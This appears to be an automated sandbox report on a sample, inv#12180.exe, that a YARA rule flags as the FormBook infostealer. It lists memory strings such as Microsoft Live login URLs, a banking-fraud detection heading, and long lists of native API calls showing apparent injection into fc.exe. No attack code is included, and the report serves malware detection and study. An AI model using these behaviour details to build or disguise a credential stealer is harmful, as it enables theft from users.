              Source: fc.exe, 00000005.00000002.3360666721.0000000003EAC000.00000004.10000000.00040000.00000000.sdmp, YVdkpeLSDe.exe, 00000007.00000002.3361955589.000000000327C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: fc.exe, 00000005.00000002.3358791223.0000000002A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: fc.exe, 00000005.00000003.2683653954.0000000007784000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
              Source: fc.exe, 00000005.00000002.3358791223.0000000002A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
              Source: fc.exe, 00000005.00000002.3358791223.0000000002A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
              Source: fc.exe, 00000005.00000002.3358791223.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.3358791223.0000000002A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: fc.exe, 00000005.00000002.3358791223.0000000002A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: fc.exe, 00000005.00000002.3358791223.0000000002A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: fc.exe, 00000005.00000002.3358791223.0000000002A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.inv#12180.exe.8f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.3359525839.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3360691498.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3358673454.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3358452668.00000000006A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2502674902.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2503026134.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3359820951.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0091CB43 NtClose,0_2_0091CB43
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2B60 NtClose,LdrInitializeThunk,0_2_014A2B60
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_014A2DF0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_014A2C70
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A35C0 NtCreateMutant,LdrInitializeThunk,0_2_014A35C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A4340 NtSetContextThread,0_2_014A4340
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A4650 NtSuspendThread,0_2_014A4650
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2BE0 NtQueryValueKey,0_2_014A2BE0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2BF0 NtAllocateVirtualMemory,0_2_014A2BF0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2B80 NtQueryInformationFile,0_2_014A2B80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2BA0 NtEnumerateValueKey,0_2_014A2BA0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2AD0 NtReadFile,0_2_014A2AD0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2AF0 NtWriteFile,0_2_014A2AF0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2AB0 NtWaitForSingleObject,0_2_014A2AB0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2D00 NtSetInformationFile,0_2_014A2D00
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2D10 NtMapViewOfSection,0_2_014A2D10
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2D30 NtUnmapViewOfSection,0_2_014A2D30
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2DD0 NtDelayExecution,0_2_014A2DD0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2DB0 NtEnumerateKey,0_2_014A2DB0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2C60 NtCreateKey,0_2_014A2C60
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2C00 NtQueryInformationProcess,0_2_014A2C00
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2CC0 NtQueryVirtualMemory,0_2_014A2CC0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2CF0 NtOpenProcess,0_2_014A2CF0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2CA0 NtQueryInformationToken,0_2_014A2CA0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2F60 NtCreateProcessEx,0_2_014A2F60
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2F30 NtCreateSection,0_2_014A2F30
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2FE0 NtCreateFile,0_2_014A2FE0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2F90 NtProtectVirtualMemory,0_2_014A2F90
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2FA0 NtQuerySection,0_2_014A2FA0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2FB0 NtResumeThread,0_2_014A2FB0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2E30 NtWriteVirtualMemory,0_2_014A2E30
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2EE0 NtQueueApcThread,0_2_014A2EE0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2E80 NtReadVirtualMemory,0_2_014A2E80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2EA0 NtAdjustPrivilegesToken,0_2_014A2EA0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A3010 NtOpenDirectoryObject,0_2_014A3010
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A3090 NtSetValueKey,0_2_014A3090
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A39B0 NtGetContextThread,0_2_014A39B0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A3D70 NtOpenThread,0_2_014A3D70
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A3D10 NtOpenProcessToken,0_2_014A3D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC4340 NtSetContextThread,LdrInitializeThunk,5_2_02EC4340
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC4650 NtSuspendThread,LdrInitializeThunk,5_2_02EC4650
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2AF0 NtWriteFile,LdrInitializeThunk,5_2_02EC2AF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2AD0 NtReadFile,LdrInitializeThunk,5_2_02EC2AD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02EC2BE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02EC2BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02EC2BA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2B60 NtClose,LdrInitializeThunk,5_2_02EC2B60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02EC2EE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02EC2E80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2FE0 NtCreateFile,LdrInitializeThunk,5_2_02EC2FE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2FB0 NtResumeThread,LdrInitializeThunk,5_2_02EC2FB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2F30 NtCreateSection,LdrInitializeThunk,5_2_02EC2F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02EC2CA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2C60 NtCreateKey,LdrInitializeThunk,5_2_02EC2C60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02EC2C70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02EC2DF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2DD0 NtDelayExecution,LdrInitializeThunk,5_2_02EC2DD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02EC2D30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02EC2D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC35C0 NtCreateMutant,LdrInitializeThunk,5_2_02EC35C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC39B0 NtGetContextThread,LdrInitializeThunk,5_2_02EC39B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2AB0 NtWaitForSingleObject,5_2_02EC2AB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2B80 NtQueryInformationFile,5_2_02EC2B80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2EA0 NtAdjustPrivilegesToken,5_2_02EC2EA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2E30 NtWriteVirtualMemory,5_2_02EC2E30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2FA0 NtQuerySection,5_2_02EC2FA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2F90 NtProtectVirtualMemory,5_2_02EC2F90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2F60 NtCreateProcessEx,5_2_02EC2F60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2CF0 NtOpenProcess,5_2_02EC2CF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2CC0 NtQueryVirtualMemory,5_2_02EC2CC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2C00 NtQueryInformationProcess,5_2_02EC2C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2DB0 NtEnumerateKey,5_2_02EC2DB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC2D00 NtSetInformationFile,5_2_02EC2D00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC3090 NtSetValueKey,5_2_02EC3090
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC3010 NtOpenDirectoryObject,5_2_02EC3010
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC3D70 NtOpenThread,5_2_02EC3D70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EC3D10 NtOpenProcessToken,5_2_02EC3D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006C93B0 NtCreateFile,5_2_006C93B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006C9520 NtReadFile,5_2_006C9520
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006C9610 NtDeleteFile,5_2_006C9610
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006C96B0 NtClose,5_2_006C96B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006C9820 NtAllocateVirtualMemory,5_2_006C9820
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_008F1B910_2_008F1B91
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_00908B130_2_00908B13
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_008F28BC0_2_008F28BC
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_008F20C90_2_008F20C9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_008F28C00_2_008F28C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0091F1630_2_0091F163
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_008F32050_2_008F3205
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_009003130_2_00900313
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_00906D130_2_00906D13
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_008FE5130_2_008FE513
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_008FE5120_2_008FE512
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_00906D0E0_2_00906D0E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_009005330_2_00900533
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_008FE6570_2_008FE657
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_008FE6630_2_008FE663
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_008F467A0_2_008F467A
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F81580_2_014F8158
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014601000_2_01460100
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150A1180_2_0150A118
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015281CC0_2_015281CC
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015301AA0_2_015301AA
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015020000_2_01502000
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152A3520_2_0152A352
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015303E60_2_015303E6
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147E3F00_2_0147E3F0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015102740_2_01510274
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F02C00_2_014F02C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014705350_2_01470535
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015305910_2_01530591
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015224460_2_01522446
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015144200_2_01514420
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0151E4F60_2_0151E4F6
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014947500_2_01494750
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014707700_2_01470770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146C7C00_2_0146C7C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148C6E00_2_0148C6E0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014869620_2_01486962
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A00_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0153A9A60_2_0153A9A6
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014728400_2_01472840
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147A8400_2_0147A840
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149E8F00_2_0149E8F0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014568B80_2_014568B8
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152AB400_2_0152AB40
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01526BD70_2_01526BD7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146EA800_2_0146EA80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147AD000_2_0147AD00
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150CD1F0_2_0150CD1F
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146ADE00_2_0146ADE0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01488DBF0_2_01488DBF
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470C000_2_01470C00
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01460CF20_2_01460CF2
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01510CB50_2_01510CB5
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E4F400_2_014E4F40
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01512F300_2_01512F30
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014B2F280_2_014B2F28
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01490F300_2_01490F30
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01462FC80_2_01462FC8
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147CFE00_2_0147CFE0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014EEFA00_2_014EEFA0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470E590_2_01470E59
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152EE260_2_0152EE26
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152EEDB0_2_0152EEDB
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152CE930_2_0152CE93
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01482E900_2_01482E90
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A516C0_2_014A516C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145F1720_2_0145F172
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0153B16B0_2_0153B16B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147B1B00_2_0147B1B0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014770C00_2_014770C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0151F0CC0_2_0151F0CC
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152F0E00_2_0152F0E0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015270E90_2_015270E9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145D34C0_2_0145D34C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152132D0_2_0152132D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014B739A0_2_014B739A
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148B2C00_2_0148B2C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015112ED0_2_015112ED
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014752A00_2_014752A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015275710_2_01527571
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150D5B00_2_0150D5B0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014614600_2_01461460
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152F43F0_2_0152F43F
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152F7B00_2_0152F7B0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015216CC0_2_015216CC
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014799500_2_01479950
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148B9500_2_0148B950
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015059100_2_01505910
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DD8000_2_014DD800
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014738E00_2_014738E0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152FB760_2_0152FB76
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014ADBF90_2_014ADBF9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E5BF00_2_014E5BF0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148FB800_2_0148FB80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01527A460_2_01527A46
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152FA490_2_0152FA49
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E3A6C0_2_014E3A6C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0151DAC60_2_0151DAC6
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014B5AA00_2_014B5AA0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01511AA30_2_01511AA3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150DAAC0_2_0150DAAC
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01473D400_2_01473D40
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01521D5A0_2_01521D5A
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01527D730_2_01527D73
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148FDC00_2_0148FDC0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E9C320_2_014E9C32
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152FCF20_2_0152FCF2
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152FF090_2_0152FF09
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01471F920_2_01471F92
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152FFB10_2_0152FFB1
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01479EB00_2_01479EB0
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeCode function: 4_2_047073064_2_04707306
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F102C05_2_02F102C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F302745_2_02F30274
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F503E65_2_02F503E6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E9E3F05_2_02E9E3F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4A3525_2_02F4A352
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F220005_2_02F22000
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F481CC5_2_02F481CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F441A25_2_02F441A2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F501AA5_2_02F501AA
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F181585_2_02F18158
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E801005_2_02E80100
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F2A1185_2_02F2A118
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EAC6E05_2_02EAC6E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E8C7C05_2_02E8C7C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E907705_2_02E90770
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EB47505_2_02EB4750
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F3E4F65_2_02F3E4F6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F424465_2_02F42446
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F344205_2_02F34420
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F505915_2_02F50591
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E905355_2_02E90535
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E8EA805_2_02E8EA80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F46BD75_2_02F46BD7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4AB405_2_02F4AB40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EBE8F05_2_02EBE8F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E768B85_2_02E768B8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E9A8405_2_02E9A840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E928405_2_02E92840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E929A05_2_02E929A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F5A9A65_2_02F5A9A6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EA69625_2_02EA6962
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4EEDB5_2_02F4EEDB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4CE935_2_02F4CE93
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EA2E905_2_02EA2E90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E90E595_2_02E90E59
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4EE265_2_02F4EE26
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E9CFE05_2_02E9CFE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E82FC85_2_02E82FC8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F0EFA05_2_02F0EFA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F04F405_2_02F04F40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F32F305_2_02F32F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02ED2F285_2_02ED2F28
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EB0F305_2_02EB0F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E80CF25_2_02E80CF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F30CB55_2_02F30CB5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E90C005_2_02E90C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E8ADE05_2_02E8ADE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EA8DBF5_2_02EA8DBF
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E9AD005_2_02E9AD00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F2CD1F5_2_02F2CD1F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F312ED5_2_02F312ED
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02EAB2C05_2_02EAB2C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E952A05_2_02E952A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02ED739A5_2_02ED739A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E7D34C5_2_02E7D34C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4132D5_2_02F4132D
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F4F0E05_2_02F4F0E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02F470E95_2_02F470E9
